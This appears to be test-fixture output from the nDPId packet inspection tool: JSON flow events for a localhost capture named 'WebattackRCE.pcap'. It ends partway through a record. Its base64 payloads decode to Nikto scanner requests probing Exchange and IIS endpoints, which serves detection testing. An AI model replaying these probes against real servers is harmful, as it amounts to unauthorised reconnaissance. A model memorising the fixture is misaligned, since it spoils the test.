-00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276779,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1576420276780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276780,"pkt":"AAAAAAAAAAAAAAAACABFAADH3u5AAEAGXUB\/AAABfwAAAcIgH5D8fubIriLokYAYAED+uwAAAQEICp1m+1SdZvtUR0VUIC9FV1MvRXhjaGFuZ2UuYXNteCBIVFRQLzEuMA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7440000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":1,"thread_ts_msec":1576420276781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1576420276781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":204,"pkt_l4_len":170,"thread_ts_msec":1576420276781,"pkt":"AAAAAAAAAAAAAAAACABFAAC+Y8xAAEAG2Gt\/AAABfwAAAcIiH5D+h1vitMrGVIAYAED+sgAAAQEICp1m+1WdZvtVR0VUIC9FeGNoYW5nZSBIVFRQLzEuMA0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7440000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":1,"thread_ts_msec":1576420276781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1576420276784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276784,"pkt":"AAAAAAAAAAAAAAAACABFAAC5ylFAAEAGcet\/AAABfwAAAcIkH5CUkvJkMc1am4AYAED+rQAAAQEICp1m+1idZvtYR0VUIC9PV0EgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1576420276786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420276786,"pkt":"AAAAAAAAAAAAAAAACABFAADdBqpAAEAGNW9\/AAABfwAAAcImH5DUMj6FKAlSCYAYAED+0QAAAQEICp1m+1qdZvtaR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMvZGVmYXVsdC5lYXMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276787,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1576420276787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276787,"pkt":"AAAAAAAAAAAAAAAACABFAAC5+PtAAEAGQ0F\/AAABfwAAAcIoH5AY5sDVvq1OaYAYAED+rQAAAQEICp1m+1udZvtbR0VUIC9ScGMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276787,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276789,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1576420276789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276789,"pkt":"AAAAAAAAAAAAAAAACABFAADHn6dAAEAGnId\/AAABfwAAAcIqH5DNYaeJfxts9oAYAED+uwAAAQEICp1m+12dZvtdR0VUIC9FV1MvU2VydmljZXMud3NkbCBIVFRQLzEuMA0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276789,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1576420276790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276790,"pkt":"AAAAAAAAAAAAAAAACABFAAC5NBFAAEAGCCx\/AAABfwAAAcIsH5ClBgwj7e4RBIAYAED+rQAAAQEICp1m+16dZvteR0VUIC9lY3AgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1576420276792,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276792,"pkt":"AAAAAAAAAAAAAAAACABFAAC5lANAAEAGqDl\/AAABfwAAAcIuH5BArawwwOPk6IAYAED+rQAAAQEICp1m+1+dZvtfR0VUIC9PQUIgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276793,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1576420276793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276793,"pkt":"AAAAAAAAAAAAAAAACABFAADD2QRAAEAGYy5\/AAABfwAAAcIwH5DBGuEtmiy9f4AYAED+twAAAQEICp1m+2GdZvthR0VUIC9hc3BuZXRfY2xpZW50IEhUVFAvMS4wDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276793,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1576420276794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276794,"pkt":"AAAAAAAAAAAAAAAACABFAADAoqZAAEAGmY9\/AAABfwAAAcIyH5C3W5qL6yWPx4AYAED+tAAAAQEICp1m+2KdZvtiR0VUIC9Qb3dlclNoZWxsIEhUVFAvMS4wDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KDQo="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7440000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420276796,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1576420276796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":201,"pkt_l4_len":167,"thread_ts_msec":1576420276796,"pkt":"AAAAAAAAAAAAAAAACABFAAC74FpAAEAGW+B\/AAABfwAAAcI0H5AdBth42VHy84AYAED+rwAAAQEICp1m+2SdZvtkR0VUIC4gSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBXZWJMb2dpYyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7440000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420276796,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7440000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420276797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1576420276797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1576420276797,"pkt":"AAAAAAAAAAAAAAAACABFAADj87RAAEAGSF5\/AAABfwAAAcI2H5ABU8uetZ1IA4AYAED+1wAAAQEICp1m+2WdZvtlR0VUIC8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZGVmbGF0ZSwgZ3ppcA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IEJSRUFDSCBUZXN0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7440000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420276797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 